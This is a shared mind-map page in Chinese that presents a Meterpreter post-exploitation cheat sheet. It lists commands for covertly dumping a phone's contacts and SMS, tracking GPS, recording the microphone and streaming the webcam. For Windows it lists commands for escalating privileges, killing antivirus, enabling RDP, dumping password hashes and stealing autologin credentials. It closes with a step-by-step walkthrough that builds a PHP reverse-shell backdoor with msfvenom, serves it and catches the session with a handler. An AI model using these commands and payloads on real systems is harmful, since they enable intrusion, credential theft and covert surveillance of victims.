导图社区 .Meterpreter
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
提示: 本内容由社区用户上传并分享。平台不对内容的真实性、合法性、知识产权归属及是否侵害第三方权利进行事前审核或保证。本内容可能包含受版权保护的图片、字体或其他第三方素材,使用前请自行确认授权范围。
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
互联网9大思维
组织架构-单商户商城webAPP 思维导图。
域控上线
python思维导图
css
CSS
计算机操作系统思维导图
计算机组成原理
IMX6UL(A7)
考试学情分析系统
Meterpreter
meterpreter 是 Metasploit 框架的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令
常用的反弹类型
reverse_tcp
常用命令
针对安卓手机的一些命令
获取手机通讯录: dump_contacts
获取短信记录:dump_sms
控制实验手机发短信:send_sms -d 15907167886 -t "hello"
获取实验手机GPS定位信息:geolocate
控制实验手机录音:record_mic -d 5
获取实验手机相机设备:webcam_list
控制实验手机拍照:webcam_snap
直播实验手机摄像头:webcam_stream
针对windows的一些命令
查看进程:ps
查看当前进程号:getpid
查看系统信息:sysinfo
查看目标机是否为虚拟机:run post/windows/gather/checkvm
查看完整网络设置:route
查看当前权限:getuid
自动提权:getsystem
关闭杀毒软件:run post/windows/manage/killav
启动远程桌面协议:run post/windows/manage/enable_rdp
列举当前登录的用户:run post/windows/gather/enum_logged_on_users
查看当前应用程序:run post/windows/gather/enum_applications
抓取目标机的屏幕截图:load espia ; screengrab
获取相机设备:webcam_list
控制拍照 :webcam_snap
直播摄像头:webcam_stream
控制录音:record_mic
查看当前处于目标机的那个目录:pwd
查看当前目录:getlwd
导出当前用户密码哈希:run hashdump
用户名:SID:LM哈希:NTLM哈希:::
也可以使用下面这个命令导出 权限更高 run windows/gather/smart_hashdump
抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin
文件系统命令
查看文件内容,文件必须存在:cat c:\boot.ini
删除指定的文件:del c:\boot.ini
上传文件到目标主机:upload /root/Desktop/netcat.exe c:\
下载文件到本机:download nimeia.txt /root/Desktop/
编辑文件:edit c:\boot.ini
打印本地目录:getlwd
打印目标目录:getwd
更改本地目录:lcd
打印本地目录:lpwd
输出目标目录:pwd
进入目标文件下:cd c:\
观看屏幕:run vnc
查看当前账号:getuid
实例
msfconsole
配置监控-使用 handler 模块:use exploit/multi/handler
配置攻击载荷:set payload php/meterpreter/reverse_tcp
模块跟后门模块一致
配置本地ip:set lhost 192.168.1.138
配置端口:set lport 4444
跟后门端口一致
生成后门:msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.138 lport=4444 R>shell.php
用python生成web服务:python -m http.server 80
执行监控
执行 shell.php